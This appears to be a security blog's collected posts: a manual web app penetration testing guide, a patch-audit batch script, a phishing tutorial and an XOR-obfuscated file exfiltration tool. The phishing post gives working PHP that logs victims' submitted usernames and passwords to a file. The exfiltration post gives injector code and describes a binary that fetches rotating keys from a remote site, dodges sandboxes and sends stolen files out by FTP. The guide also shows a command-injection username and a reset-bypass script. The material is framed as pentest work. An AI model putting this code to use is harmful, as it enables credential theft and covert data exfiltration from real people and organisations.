Web App Testing via Interrogation – Q&A not QA

You've set up your Burp proxy, walked through the application, run some spidering, and configured your sessions; now the scanning begins, rockstar, let's see all those vulns. Stop. Let the scanner do its work. Now it's time to do yours and thoroughly enjoy it. Clear cache and cookies. Make a new user. Spin up a new Burp instance if need be. Savor this moment of simplicity. Tell yourself you'll only look at the scan results to validate that the scan is running without error. You'll have time to validate all those red blinking things later.

It all begins with a question?

Yes. Penetration testing is nothing more than a series of questions and answers. We have automated questions, questions that get answered and parsed into pretty interfaces, not-so-pretty interfaces, and everything in between. There are questions we ask our clients about the engagement, questions we ask them about the scope, questions we ask ourselves before testing. The most important questions during the test window, though, are the ones we ask the application itself. You could ask the devs, and sure, that might work if they had time to respond to your every inquiry and knew what would happen in the first place; talking to devs for extra insight is certainly helpful. But most of your questions should go to the application itself. That may sound absurd. Why would you ask your human-formulated questions to an application? Because you'll begin to see the test for what it really is: a Q&A session between you, your tools, your caffeine intake, and your target.

When you're asking questions of your target application it's best to start off simple so you're not immediately bogged down in details. What is your purpose? Who uses you? What does this button do (non-technically)? Simply walk through the application and ask it these questions in the form of GET/POST requests. Go to the sitemap, go to the help page, give it a skim. Find the answers to the questions you formulate in the responses you see, and just be childishly curious. No need to write any of these questions or answers down; no one is a fan of overhead, just keep them in your head. Then we ask the really obvious ones everyone asks but that are paramount in importance: What's stored on this site that's valuable to an attacker? Passwords? CC numbers? Personally identifiable information? Proprietary information? The client's reputation? More often than not it's a combination of most if not all of those; and yes, their site source code is probably considered 40% proprietary and 60% Stack Overflow (rough estimate).

Then we get out our notepad (or vim or nano or Notepad++, or cat >> ./notes, whatever). Now it's time to record questions that really do need solid answers, if it's possible to obtain them.

What webserver is this? Does it change at all for certain pages/domains? What OS is this webserver running under? Does that change for certain pages/domains? What is the backend database? What framework are they using? (Ignore versions for now; more on that later.) Where are they getting/sending their data from/to (external/internal sources) and how? OK, drop the pen. Save it somewhere and fill it out as you go. Let's get back into the pure wetware.

How did you do that and why?

This is often the simplest question to formulate and one of the most difficult to answer, which also makes it one of the most valuable. How did you send that email to my inbox when I told you I forgot my password? Let's check our inbox. Let's check our mail headers. Did they really just send my cleartext password over email? Why did you have it in cleartext? YOU HAD IT IN CLEARTEXT?? YOU SENT IT OVER SOME RANDOM RELAY YOU DON'T OWN? Damn you. How did you make that nonce token? Are you using some algorithm that factors in time? Why is it that when I request 30 password resets in quick succession their values are very close, if not sometimes identical? How did you verify that I had that many credits on my account? How did you just add that credit? Why does the page restrict me from going back? Does it not want me to hit page 2 again? Why did you think that JavaScript was going to force me not to put a minus sign or a ' in that input box? How did you verify that the two values were the same through that series of POST requests you called a transfer? Why is that strange base64 "encrypted" value stuck at the end of that URL now?

These are just disorganized sample questions; what's really valuable here is being observant of every parameter and process in every request and noticing change. Notice the small things: don't be afraid to diff those two seemingly similar randomized strings. When you see they're similar but not the same, ask why or how, or even better, both. The other part of "how" is formulating how you might implement it. I don't mean code it out. Just think for a second how you'd handle a small subset of the application's logic and focus on it. What would you do to get from A to B? This is where being somewhat of a developer pays off. It will allow you to tap into a reservoir of assumptions the programmer might have made, because your way may have been the correct way. You test to see if your implementations differ, how they differ, and then perhaps why.

A simple real-world example observed on a prior engagement: you begin testing a series of 3 POST requests used in the 'forgot password' functionality. The first page accepts a username. The second, the security questions for that user (yes, you already see that it's user enumeration and security question enumeration). And finally the third page resets the password by asking the user to enter the new password twice to confirm. No emails are sent; by design it's actually terrible. So let's break it with questions. First you ask: how is it confirming my security questions? That's fairly simple. You test other questions like: is it case sensitive? What happens when I omit the security questions when POSTing to that page, and what happens when I try to cause the application to fail by assigning the POST parameter as an array instead of a single string (fail open: e.g. answer[]=catchme)? Is it rate limiting? Or is it requiring a strong CAPTCHA on the security questions to prevent brute force? None of this seems to do anything really useful. Failures always redirect back to the security question page with an error stating the answer was incorrect. Well, that's unfortunate. But I'm not done interrogating it. So how is this thing working? The first page POSTs to itself, as do the others. The response when it's successful is a redirect to the next page, and the security question page follows similarly. How does the next page know what you entered on the last page? It must be something I'm sending... namely the cookie, and therefore the session. So you test this theory by requesting the questions page itself without cookies. It redirects you to the page that asks for the username. You re-insert the cookie into the same request and observe that it asks you for the security questions. Confirmed! Then you begin to wonder what other values are tied to the session, and it hits you: what if the set-new-password page never checks that I actually entered the correct security question answers and instead only checks the username? You enter the username into the first POST request, copy the cookie, and POST to the third. Voilà. A success page indicates you have successfully changed the password. Ouch.
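If you want to replay that interrogation outside the browser, here's a minimal sketch of the same idea in Python with requests. The endpoints and parameter names are hypothetical stand-ins, and it assumes the session cookie is the only state being checked:

import requests

s = requests.Session()  # one Session = one cookie jar, just like the browser

# Step 1: submit only the username; the app ties it to our session cookie
s.post("https://target.example/forgot.php", data={"username": "victim"})

# Step 3: skip the security questions entirely and go straight to the reset
r = s.post("https://target.example/reset.php",
           data={"newpass": "owned123", "confirm": "owned123"})
print(r.status_code, "success" in r.text.lower())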

Where are you?

Have you ever noticed your scanner missed a very simple parameter because it simply couldn't understand the format? Have you ever seen an application scanner waste precious time grinding against a page that you knew wasn't going to actually process anything, because it required prior steps to associate the session with the logic of what was getting sent to the backend? I have; it's annoying. Sometimes annoying enough to write extensions, but for the most part it's more beneficial to identify that input or series of inputs and throw it through your own battery of tests, either with those machine hands of yours or Burp Intruder if you're into that whole brevity thing.

Let's talk about delimiters. What are they if not parameters within parameters? A scanner will treat one GET/POST/cookie/JSON/XML element parameter as a single parameter. But you're smarter than a scanner. Sometimes it's beneficial to go look through the parameters and spot delimiters, because the scanner will likely have just appended a payload. But you! You can put any payload anywhere you please.

So go find the delimiters in this and count the possible parameters, I’ll wait:

[Image: parameters]

Got a number? I didn't count either. But if you did, it's a good exercise! I'm not pentesting it so I don't have the time, but you might be! It's important to prioritize and always keep the time in mind, after all (see conclusion). Break down the obvious ones (thanks Burp):

[Image: parameters_highlight]

But what about…

[Image: parameters_highlight_other]

These parameters need love too. Yes, I missed a few. With the 'nt' parameter it should be fairly obvious where we want to break in: likeliest are those number values themselves, perhaps even the parameter names if they cause a nice exception or an interesting stack trace. Now that 'tl' parameter has me curious... how many parts can I break it up into?

[Image: parameters_highlight_broken]

Always URL decode; even for hex ninjas it's easier on the eyes. These are relatively mundane looking, but they serve an illustrative purpose. You have to ask exactly where the inputs to the application's logic are. Just because some filters are applied to one part of a parameter doesn't necessarily mean the other part of the parameter gets the same filter. What this is getting at is that it's just as important to find where as it is how. Content and input discovery are crucial to giving you more attack surface. Don't overlook trivial things.
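If you want to automate that poking, here's a rough sketch of fuzzing each delimited sub-part on its own; the URL, parameter name, delimiter, and payload are all illustrative:

import requests

value = "126::522::1233120::3"   # e.g. the 'tl' parameter after URL decoding
delim, payload = "::", "'"

for i, part in enumerate(value.split(delim)):
    parts = value.split(delim)
    parts[i] = part + payload            # tamper with one sub-part at a time
    r = requests.get("https://target.example/page",
                     params={"tl": delim.join(parts)})
    print(i, r.status_code, len(r.content))   # anomalies get manual follow-up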

Some tips to speed things up:

[Image: hotkeys]

Hotkeys – learn to love them. Any decent RTS player will tell you they aren't simply a convenience, they're a necessity! Try to bind them so your left hand can hit them easily by itself, because your right hand will likely be busy with either the mouse or a coffee mug. They will speed up these repetitive pokes considerably, and you'll be more likely to perform them if they're easier; human nature.

Where do you see yourself in 5 pages?

What's getting stored in the data structures associated with your session that you control, like in the example in the first section, or even in other users' sessions? This doesn't just apply to finding stored XSS. This is another part of identifying inputs, but these are inputs into the data layer, not simply the first page. How does one parameter carry over to other pages, and what is reflected back? If it is reflected back, is it encoded or filtered differently? This may be an indication that they're sanitizing output on some pages but not performing proper input filtering. Scanners have a very difficult time observing these types of bugs because they're mostly focused on the response to the immediate request. Every single input that gets transmitted to another user, sent over email, posted to another site, or used in other components of the system should be carefully scrutinized, and you'll quickly realize how many objects that actually is. For every input you believe will be transmitted, ask: where is it going? How is it getting there? Then you get into the myriad of "what ifs". What if I set my username to me%0aping%20-c%201%20mysite.com%0a when I know they're setting up some limited shell service for me? What if I encoded my username in such a way that it would be equivalent to another user's account in the authentication component, without triggering the duplicate-user check on the sign-up page, through a Unicode trick? Where is this data going? The interactions of different components and their technologies sometimes bring forth the nastiest and most lethal of vulnerabilities.
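One low-overhead way to track this is to plant a unique, greppable canary in every input and then walk the rest of the app looking for where each one surfaces. A quick sketch; the field names and URLs are made up:

import uuid
import requests

s = requests.Session()
canaries = {}
for field in ("username", "address", "comment"):
    token = "zz" + uuid.uuid4().hex[:8]      # unique and easy to grep for
    canaries[field] = token
    s.post("https://target.example/profile", data={field: token})

for page in ("/profile", "/admin/users", "/export.csv"):
    body = s.get("https://target.example" + page).text
    for field, token in canaries.items():
        if token in body:
            # found a reflection; now check how it was encoded/filtered
            print("%s reflected on %s" % (field, page))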

What more can you tell me?

Are you a cat or a mouse? Sometimes you get verbose headers that tell you nearly everything you want to know about a webserver type and its version number and/or the tech stack being used. This is fantastic. You've already filled out those questions. But there is more; code re-use is extremely prevalent, and not all programmers actually monitor security feeds to spot new CVEs. What if the server is telling you next to nothing about the webserver or frameworks in use in its headers? Tools like httprint are useful, but sometimes it's nice to just do the job manually to determine a webserver or webserver version. Frameworks and libraries in use can also be identified. There are so many ways of doing this that this section won't be exhaustive, but hopefully it'll get you on the right track.

There are simple ways of identifying a framework based on the parameter names it uses, the most obvious being something like __VIEWSTATE, which would likely be ASP.NET, or JSESSIONID, which would likely be Java and Tomcat. Googling cookie names and parameter names will give you very interesting things to look into. For instance, Apache can often be identified by requesting /server-status or /status and seeing a 403 Forbidden or a similar non-404 error message. For IIS, I typically check for /trace.axd. For Apache version identification I sometimes poke at individual CVEs I know are easy to throw, like CVE-2012-0053, which will narrow it down to 2.2.x through 2.2.21 and give you another finding. These will give some detailed error messages that may help. Any time you see error messages, it's highly advisable to copy them, put them in quotes, and Google them, as they will likely be on Stack Overflow explaining an existing bug and will help you narrow down the libraries, frameworks, or webservers in use and their associated versions. Sometimes error strings also change from version to version: check out the SVN or GitHub repo of that project and see when the change was made; you now have a ballpark range of versions if you can narrow down when a particular item was changed. To query languages or frameworks in use, it's often necessary to delve a little deeper into the behavior of certain applications. Some apps will accept 'answers[]=this' and not complain; PHP, on the other hand, will shit itself complaining that the parameter is not of type string, or a similar error. It's extremely important here to fuzz parameters and try to get as many error messages or anomalies as possible. I like fuzzdb, but you'll do well to add to the list of payloads and techniques to identify peculiarities. This is the magic sauce; it can be taught, but it's much more pleasurable and beneficial to gain these over time with lots of tinkering and questions.
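Those path checks are easy to loop. A small sketch of the same probes; the path list is just the examples above, grow your own:

import requests

probes = {
    "/server-status": "Apache mod_status (even a 403 is a tell)",
    "/status": "Apache status alias",
    "/trace.axd": "IIS / ASP.NET tracing",
}
for path, hint in probes.items():
    r = requests.get("https://target.example" + path, allow_redirects=False)
    if r.status_code != 404:
        print(path, r.status_code, "->", hint)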

The overall question is: what combination of 3rd-party libraries/frameworks makes up this application? Go through your request log in the Target tab and look for seemingly unique names in URLs, like /js/dojo/something.js. Go take a look and then ask the application: how often have you been updated? Check the CVEs against that library and download the library itself. Look at the file structure of the deployment and look for things that might be left behind in those directories: files like VERSION, README, configuration files, and the like are especially handy for identifying information disclosures. This information in turn can be used to ask further questions about backported patches: what did the devs change from version X to Y in association with this CVE, and where can I confirm the vulnerability? You might find default test pages with XSS, debug output from something the developers forgot to delete, or even new bugs in the libraries they're using. The advantage of a lot of open-source 3rd-party libraries is that you actually have the source code to confirm some things with, and if time permits (or if attack surface is limited enough to justify a deep dive), research new vulnerabilities in the 3rd-party library/framework. Your clients will be thrilled and it's also deeply satisfying; particularly Googling 'inurl:' statements to see how many systems your 0day just popped and giggling like a schoolgirl as you go informing the vendor(s).
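A sketch of that leftover-file hunt once you've spotted a library path; the filenames here are the usual suspects, not a definitive list:

import requests

libroot = "https://target.example/js/dojo/"   # path spotted in the Target tab
for leftover in ("VERSION", "README", "CHANGELOG", "package.json", "tests/"):
    r = requests.get(libroot + leftover)
    if r.status_code == 200:
        # the first line often carries an exact version string
        print(leftover, "->", r.text[:80].replace("\n", " "))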

Eventually you should get better and better at identifying unique strings that make for great Google searches. Just keep asking questions about what is being used, and be relentless in your interrogation.

Now what aren’t you telling me?

The little lies in an application that you may notice, either with great thought and further probes or even immediately, are called assumptions. Do you assume I will go to page X, Y, then Z? What if I went directly to Y first? What if I went to X, established some session variable, then went to Z? What if you actually weren't checking that CSRF token value? What if I omitted it completely? Here is where you simply exhaust attack options. You've identified key components, the hows of important things like authentication and parts of session management; maybe you understand a decent portion of their interactions, but it's closing time. Start asking "what ifs" like it's going out of style. The questions you asked the application beforehand might give you some insight into what to ask next for each particular component you're checking. Omission is an input in and of itself, in a way.
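The CSRF what-ifs above take about ten lines to ask programmatically. A sketch, with hypothetical URL and field names, diffing the omitted-token and blank-token variants against a legit request:

import requests

url = "https://target.example/account/email"
base = {"email": "attacker@example.com", "csrf_token": "REAL_TOKEN_HERE"}

legit = requests.post(url, data=base)
variants = [{k: v for k, v in base.items() if k != "csrf_token"},  # omitted
            dict(base, csrf_token="")]                             # blank
for data in variants:
    r = requests.post(url, data=data)
    # same status and length as the legit request = token likely isn't checked
    print(r.status_code, len(r.content) == len(legit.content))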

Sometimes a little automation is in order: brutally assault the app, then ask more questions if abnormalities appear:

[Image: intruder]

(Using Burp Intruder to exhaustively go through %00-%ff and observe responses – use the hex digit bruteforcer, extracting the error code from the page with the 'grep extract' feature.)

Simple questions such as "what types of characters will this app accept, and how does it return them to me afterwards?" can lead to very interesting results if you know where to look for the error code. Oftentimes it's as simple as content-length differences from the norm; occasionally you'll get error messages. When the app gives you an error message, you Google that string in quotes, and then you've likely answered another question: what exactly are they using, and how can I exploit it? I admit a strong reliance on Burp's toolset. I can't stress enough the need to learn Burp Intruder inside and out. It's a fantastic tool. Learn to sort the responses to your fuzzing, learn to develop your own payloads, and learn to grep extract. Response content length is a huge indicator, but things like the 'response time' column are just as useful in identifying potential weaknesses. Interrogating through Intruder is that blend between automation and manual tinkering where I find some of the most interesting answers to my questions. Alternatively, you can script a lot of these tests that require automation; I find that, given the number of test cases against the number of inputs I'm up against, it's often better to hand the automation off to Burp instead of writing up some spaghetti Perl/Python for each particular situation. One final tip is session management: this can be done in Options->Session handling rules. Burp can augment existing tools (proxy through Burp and set scope to proxy), make Intruder and the scanner more reliable, and overall do some crazy things. More information can be found at http://portswigger.net/burp/help/options_sessions_ruleeditor.html
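If you do end up scripting it, here's a rough stand-in for that Intruder run: walk %00-%ff through one parameter and flag responses that drift from the baseline. The URL and parameter are illustrative, and expect some benign length drift to eyeball:

import requests

base = requests.get("https://target.example/search?q=test")
baseline = (base.status_code, len(base.content))

for i in range(256):
    r = requests.get("https://target.example/search?q=test%{:02x}".format(i))
    sig = (r.status_code, len(r.content))
    if sig != baseline:   # status or content-length outlier, look closer
        print("%{:02x}".format(i), sig,
              "{:.2f}s".format(r.elapsed.total_seconds()))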

Conclusion

Be curious, ask questions, Google things, poke things, watch things blow up. The real crux and bane of every webapp pentester's existence, though, is time. It's absolutely crucial to keep the grand picture of things in mind. If you have one day left and your scanner tab has been blinking red the entire time you've been doing manual testing, it's time to put down the manual poking and begin validating/triaging potentially excellent findings. I know I strayed away from the scanner and forbade its use, but that was more of a point to put the real focus on the manual questioning, not the automated one. Automated scans can be extremely useful for coverage, and their output can often feed back into your existing manual tests and even give you information to answer some of your questions. Hopefully that's in the form of SQL error messages and the like.

Blue Teaming/Audit scripts

I love doing "Red Teaming" stuff, but every once in a while a customer will ask us to perform a "Blue Team" assessment to help them gear up for a compliance audit. For example, I did a lot of work for energy/utility companies, and most of that work was helping them prepare for their NERC audits. Part of this assessment was tracking down assets and gathering information. Some of these assets were PLCs, HMIs, modems, and other "non-traditional" devices, but for the most part there were a lot of Windows or Linux systems. For the Windows side, we had a few scripts that would gather user information, security policies, patch information, and other stuff. This made life easier, because we had a thumb drive that would autoload (if allowed) our batch script and gather this information in a matter of minutes. Anyway, part of that assessment was to identify missing patches. If you are familiar with MS products, they have the Microsoft Baseline Security Analyzer (MBSA), which will gather information about missing patches and other stuff.

For this post, we will concentrate on patches. The great thing about this tool is that it has a CLI client that is added during installation. This client can be easily copied and is small enough to fit on a small to medium sized thumb drive. It works with the Windows Update Agent (WUA). You will have to download the latest offline ".cab" file from MS. Once that is done, you can use the MBSA client to scan remote or local computers.

In this example we will be scanning a local computer. I have made a batch script to perform this.


@echo off
echo === Gathering information for %COMPUTERNAME% ===
mkdir %COMPUTERNAME%
mbsacli.exe /nvc /xmlout /wi /unicode /catalog "%CD%\wsusscn2.cab" > %COMPUTERNAME%\%COMPUTERNAME%_MBSA.xml

You can easily add other things to the script, but for now I will keep it basic; you can find a list of commands here. This script will make a directory, run the client, and then save the output as "computername_MBSA.xml".
/nvc: don't check for a new version of MBSA
/wi: display all updates
/xmlout: create XML output
/unicode: Unicode output (used for formatting)
/catalog: use the specified ".cab" file; the path to the cab file must be given

To display the full list of options use the “/?” command.

What isn't shown here is the "/listfile" option, which will take a list of servers by NetBIOS or FQDN name and scan them. You must also specify the path of the "servers2scanlist.txt". You can also scan a range of IP addresses with "/r".

Note: you must have "Wusscan.dll" in the same directory or it will not run. Also, you must be an administrator, or specify an admin user with the "/u" and "/p" options.
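If you'd rather drive the list scan from a script, here's a minimal sketch wrapping the same switches from Python; whether /xmlout plays nicely with /listfile is an assumption on my part, so confirm against "/?" first:

import subprocess

# one run against the whole server list, stdout captured to an XML file
with open("mbsa_list_scan.xml", "w") as out:
    subprocess.call(["mbsacli.exe", "/listfile", "servers2scanlist.txt",
                     "/nvc", "/xmlout", "/wi", "/unicode",
                     "/catalog", "wsusscn2.cab"], stdout=out)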

Now that we have everything in the same directory, we can start.

(1). Run the script by “double clicking”

[Image: batmsb]

(2). As you can see, it creates the local computer name directory, and inside that directory is the MBSA XML file.
[Image: dir]

Now if we view the file, we see all the patches for this local computer.
[Image: xmloutput]

It looks like a blob of nothing, so I created a simple Python script to list whether patches are "Installed" or "Not Installed".

[Image: parsebasic]

In this case, I am more interested in patches that aren't installed. This outputs the BulletinID, Severity, and Title. You can easily add in reference links and other information.
[Image: notinstalled]
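A minimal take on that parser, assuming the MBSA XML uses <UpdateData> elements with IsInstalled/BulletinID/Severity attributes and a <Title> child; adjust the names to whatever your MBSA version actually emits:

import xml.etree.ElementTree as ET

tree = ET.parse("COMPUTERNAME_MBSA.xml")     # the file the batch script wrote
for upd in tree.iter("UpdateData"):
    if upd.get("IsInstalled") == "false":    # only the missing patches
        print(upd.get("BulletinID"), upd.get("Severity"),
              upd.findtext("Title", default="?"))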

Ok, simple enough.

The possible evilness of this: as I said before, you can easily script this to scan a range. For example, say you are on a "Red Team" test and you have gathered some form of administrative credentials; your next step would be to move laterally and work your way up to a DC and file shares. That is good, but I have known some companies to block the use of "psexec" for certain users. Of course there are other ways to move laterally besides that. But my point is, now you can use this on/from a compromised computer, or if you are on an internal test, run it from your machine. It will help take some of the guesswork out of finding your next target and seeing what they are vulnerable to. It will be noisy; however, if they have normal vulnerability-scanning traffic going on, it may blend right into that noise. The next steps would be to write this in PowerShell and also update my Python script to search for specific patches, display a prettier format, or even save to CSV or HTML. As always, files can be found on my github.

Merry Christmas!!

Let’s Go Phishing!

So, I was chatting with a co-worker about ways to track certain things while on a phishing engagement. One of the things the customer wanted to track was browser versions. Of course, this is a great way to see if patching is lacking and if users are using a non-standard browser. There are tons of ways, and things, we can track: User-Agent strings, creds, hostname/IP, and so on. You can use PHP, JavaScript (JS), ASP.NET, or whatever. After searching around in my old scripts, I remembered that there was an easy way to track things with PHP. So I wanted to share how you can use this during a phishing campaign.

Setup

First, in order to test our "stealer" script, we have to set up our environment. Because I am lazy, I will not make our phishing site look "legit". This blog post is more of a "you can start here and expand" type of thing. Anyway, if you want to go all crazy and create a "real" looking site and DB, you can. However, I did a simple login page and DB setup.

Host: CentOS 5, PHP 5.1, MySQL 5

Note: I am running older versions of stuff because of other testing. Therefore, some functionality may have changed in later versions. I know in PHP >= 5.3 there are more functions to gather info on the victims visiting your page.

Before we begin, you have to set up your database. You can easily do this by installing MySQL.

(1). Create your database. I created a database called "webdb".

mysql> create database webdb;

(2). Create a table. I created a “users” table with three parts (ID,username,password).

mysql> CREATE TABLE users (ID MEDIUMINT NOT NULL AUTO_INCREMENT PRIMARY KEY, username VARCHAR(60), password VARCHAR(60));

(3). Create a user to control the webdb database.

mysql> create user 'webdbuser'@'localhost' identified by 'strongpassword';

or you can set the password this way.

mysql> set password for 'webdbuser'@'localhost'= PASSWORD('strongpassword');

(4). Give privs on the “webdb” DB to the user you created.

mysql> GRANT ALL ON webdb.* TO 'webdbuser'@'localhost';

(5). Start to add users to your database

mysql> insert into users(ID,username,password)
    -> values(5,'tony',PASSWORD('ironman'));
Query OK, 1 row affected (0.14 sec)

Obviously, you will start at 1 and work your way up. Once that is completed it should look something like this.

mysql> select * from users;
+----+----------+------------------+
| ID | username | password         |
+----+----------+------------------+
|  1 | bruce    | 171f5d1d71f84332 |
|  2 | clark    | 6f12b8fd4d9f0334 |
|  3 | peter    | 0a901b8559f60af9 |
|  4 | oliver   | 3b38eb7a071dab70 |
|  5 | tony     | 6e5fec7a1590c258 |
+----+----------+------------------+
5 rows in set (0.00 sec)

Ok, now for the PHP setup. I will post all of this on my github. I have created a little front-end for our DB. It verifies that the user is in the DB and has the correct password. If they do, they are forwarded to the "login_success.php" page; if the creds are entered wrong, they are forwarded to the failure page. Our phish site has 3 parts:

(1). Main "index.php" page. This page is a simple form. I have added the following line so that the creds are sent to the "check_login.php" page:


<form name="form1" method="post" action="check_login.php">

[Image: mainlogin]

(2). Success page

[Image: success]

(3). Failure page

[Image: fail]

The page we are concentrating on is "check_login.php". This page contains creds to connect to our database and performs the query that verifies the user. It is also where we have our "stealer" script. The script is only a couple of lines, but does the job quick and easy.

<?php
// ... DB connection and the SELECT that checks the submitted creds go here
// (elided in the post); $count is illustrative: 1 when the creds matched.
if ($count == 1) {
    header("location:login_success.php"); // forwards us here if user enters correct info
    $credfile = "creds.txt";              // file to create and hold our stolen info
    $handle = fopen($credfile, "a+");     // appends to file or creates if not there
    foreach ($_POST as $variable => $value) { // logs the POSTed variables (username/password)
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r");
    fwrite($handle, "UserAgent");
    fwrite($handle, "=");
    fwrite($handle, $_SERVER['HTTP_USER_AGENT']); // User-Agent
    fwrite($handle, "\r\n\r\n");
    fclose($handle);
    exit;
} else {
    header("location:login_failure.php"); // forwards if user enters incorrect info
    $credfile = "creds.txt";
    $handle = fopen($credfile, "a+");
    foreach ($_POST as $variable => $value) {
        fwrite($handle, $variable);
        fwrite($handle, "=");
        fwrite($handle, $value);
        fwrite($handle, "\r\n");
    }
    fwrite($handle, "\r");
    fwrite($handle, "UserAgent");
    fwrite($handle, "=");
    fwrite($handle, $_SERVER['HTTP_USER_AGENT']);
    fwrite($handle, "\r\n\r\n");
    fclose($handle);
    exit;
}
?>

Nothing super elite, but it does the job. Note: depending on your setup, you may run into a few issues. If your web directory is not writable by your web user, then you will not be able to write/create the cred file. In my case, I have the "apache" user in the "apache" group. You can create a special place where you want to log the data and chown that directory. Or if this is in a test environment, who gives a poo: chown apache:apache /var/www/

When everything is done and a user has visited your site:


[root@localhost www]# cat creds.txt
usrname=bruce
passwd=batman
Submit=Login
UserAgent=Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.5) Gecko/2008121911 CentOS/3.0.5-1.el5.centos Firefox/3.0.5

From here, you can do all sorts of things using JS, jQuery, etc. If you wanted to serve up different exploits matching on User-Agent, you can do that. Or if you want to use JS, which is not a bad way of doing it, remember that JS is client-side, so you'll need to assign the info to a variable and forward it back to the server.

Not my code; I believe I got it from Stack Overflow or somewhere, so credit to whoever wrote it. It does the job well. It basically matches the browser version using the JS navigator object, and should match all the way up to IE11 as well as other browser types.



Rollin with XOR

XOR'ing malicious binaries has always been a malware staple, but I decided to use it on the data being exfiltrated, to try to make the lives of anyone on the defensive side harder. (Note: this was for penetration testing purposes.)

The obvious downside to having the routine built into the binary is that static analysis will usually cough up the XOR key. If I am generating the key at run time using an algorithm built into the binary then the key would be coughed up using dynamic analysis. What to do…

I decided that I would host a key on a website, injected into an XML comment tag, and then use a script that changed the key every X seconds. Not exactly reinventing the wheel, but effective nonetheless. Well, finding a XOR key isn't hard using a variety of tools such as those by Didier Stevens, so I decided to up the annoying factor by doing a random number of XORs in succession, generated randomly on a remote server every X seconds. Ta-da, we have a pain in the ass. The "obvious" way to find the key is to have full packet capture on your network, reconstruct the pcaps, find the string that was pulled, and decode. Doing that in practice is harder. What if the binary calls out to five or six domains and the string it pulls is hidden deep in the code? PITA. If the binary is run in a sandbox it won't do the final send-off of the data if it can't pull down the code, and if you run it after the fact to duplicate the scenario, the XOR codes will be different, and the extension of what was stolen will likely have changed as well, throwing off reconstruction of the data loss.

The codes are injected into PHP files which are then included into the main index page with a simple include, something like:
[js]
<?php
// reconstructed include: pull the rotating values into the page
// (they end up between the UID/DIU tags the binary greps for)
include("injectcode.php");
include("stealtype.php");
?>
[/js]

It seemed the easiest way to do things. It's all written in Python, and with the excellent PyInstaller a working Win32 binary is just seconds away.

The injector also writes the decoding instructions along with a timestamp to a log file server-side, so that when you get your exfiltrated garbage you can decrypt the file by looking up the correct code via the timestamp.
Here is an example log file…
[js]
201310101726: Decode via XOR'ing: ['0x46', '0x79', '0x85', '0x80']
201310101731: Decode via XOR'ing: ['0x15', '0x68', '0x39', '0x89']
201310101736: Decode via XOR'ing: ['0x96', '0x99']
201310101741: Decode via XOR'ing: ['0x53', '0x65']
201310101746: Decode via XOR'ing: ['0x57', '0x55', '0x31', '0x54']
201310101751: Decode via XOR'ing: ['0x48', '0x55']
201310101756: Decode via XOR'ing: ['0x68', '0x87', '0x98', '0x19', '0x28']
201310101801: Decode via XOR'ing: ['0x51', '0x55', '0x23', '0x17']
201310101806: Decode via XOR'ing: ['0x36', '0x77', '0x01', '0x26', '0x76']
201310101811: Decode via XOR'ing: ['0x74', '0x83']
201310101816: Decode via XOR'ing: ['0x03', '0x24']
201310101821: Decode via XOR'ing: ['0x15', '0x34', '0x05', '0x90', '0x61']
201310101826: Decode via XOR'ing: ['0x82', '0x85', '0x26', '0x21', '0x92']
201310101831: Decode via XOR'ing: ['0x71', '0x85']
201310101836: Decode via XOR'ing: ['0x57', '0x36', '0x62', '0x51', '0x27']
201310101841: Decode via XOR'ing: ['0x86', '0x36', '0x60', '0x60', '0x06']
201310101846: Decode via XOR'ing: ['0x64', '0x17', '0x95']
201310101851: Decode via XOR'ing: ['0x33', '0x26']
[/js]
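The decode side isn't shown in the original scripts, but it falls out of the log format. A sketch that looks up the codes for a timestamp and applies them in the logged (already reversed) order; filenames here are illustrative:
[js]
import ast
import re

stamp = "201310101726"            # timestamp matching the grab you captured
codes = []
for line in open("logfile.txt"):
    if line.startswith(stamp):
        codes = ast.literal_eval(re.search(r"\[.*\]", line).group(0))
        break

data = bytearray(open("exfil.bin", "rb").read())
for code in codes:                # the log already stores the codes reversed
    key = int(code, 16)
    for i in range(len(data)):
        data[i] ^= key
open("exfil.decoded", "wb").write(data)
[/js]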

Here is the code for the injector, which writes the code into a PHP file included on the website. I also did some simple obfuscation of the filetype to steal by base64-encoding it and injecting it onto the website between tags. The injector function creates a random string anywhere between 6 and 12 chars long, which correlates to 3 to 6 XORs in a row. If you want to be a real thorn, go 6 to 12 XORs or whatever suits you.

[Image: grab1]

The binary itself uses some standard libraries such as urllib2 to grab the webpage, then uses a regex to get the unique XOR code and the extension to steal from between two tags (UID for the XOR code, DIU for the extension).

[Image: grab1]

Then, once the XOR code and the file extension dictating what will be exfiltrated are pulled into the binary, the appropriate number of XOR encryptions are made and the file is sent out. In my case I used FTP, since I was trying to help the good guys and not be too sneaky. If a garbled file being sent to a remote FTP server doesn't trigger your network sensors, you may want to re-evaluate things.

[Image: grab2]
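For completeness, the send-off is nothing fancier than ftplib; host, creds, and filename here are illustrative:
[js]
from ftplib import FTP

ziptimestamp = "201310101726.zip"      # the XOR'd archive built by crypt()
ftp = FTP("exfil.example.com")
ftp.login("drop", "drop")
with open(ziptimestamp, "rb") as f:
    ftp.storbinary("STOR " + ziptimestamp, f)
ftp.quit()
[/js]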

Functions in the injector, to be hosted on your Apache server with /var/www as your working web directory…

Code for copying and pasting. Side note: is there a Sublime Text-looking code plugin for WordPress?? Anyone?
[js]
import base64
import random
import time
from random import randrange
from time import gmtime, strftime

def stealtype():
    ext = raw_input("What type of file do you want to steal?: ")
    ext = base64.b64encode(ext)
    webfile = open('/var/www/stealtype.php', "w")
    webfile.write(ext)
    webfile.close()

def injector():
    while True:
        # randomly encoding 3 to 6 times in a row (6 to 12 digits, 2 per code)
        numdig = randrange(6, 14, 2)
        digits = '0123456789'
        randomstring = ''
        for x in range(0, numdig):
            num = random.choice(digits)
            randomstring += num

        # write code to injector file which is included on locally hosted webpage
        webfile = open('/var/www/injectcode.php', "w")
        webfile.write(randomstring)
        webfile.close()

        # create decode directions stored in logfile.txt along with UID to ref
        numxors = numdig / 2
        n = 2
        xorcodes = [randomstring[i:i+n] for i in range(0, len(randomstring), n)]

        for x in range(0, numxors):
            xorcodes[x] = '0x' + xorcodes[x]

        # flip order for decryption directions
        # since A(x)=>B(x)=>C(x) = D, reversing to plaintext: A = D(x) => C(x) => B(x)
        # where x is the unique XOR for each level of pseudo encryption
        xorunencode = str(xorcodes[::-1])

        # make logfile with timestamp and code so you can correlate and decode
        trampstamp = strftime("%Y%m%d%H%M", gmtime())
        trampstampwithcode = trampstamp + ": Decode via XOR'ing: " + xorunencode + "\r"

        logfile = open("logfile.txt", "a+b")
        logfile.write(trampstampwithcode)
        logfile.close()
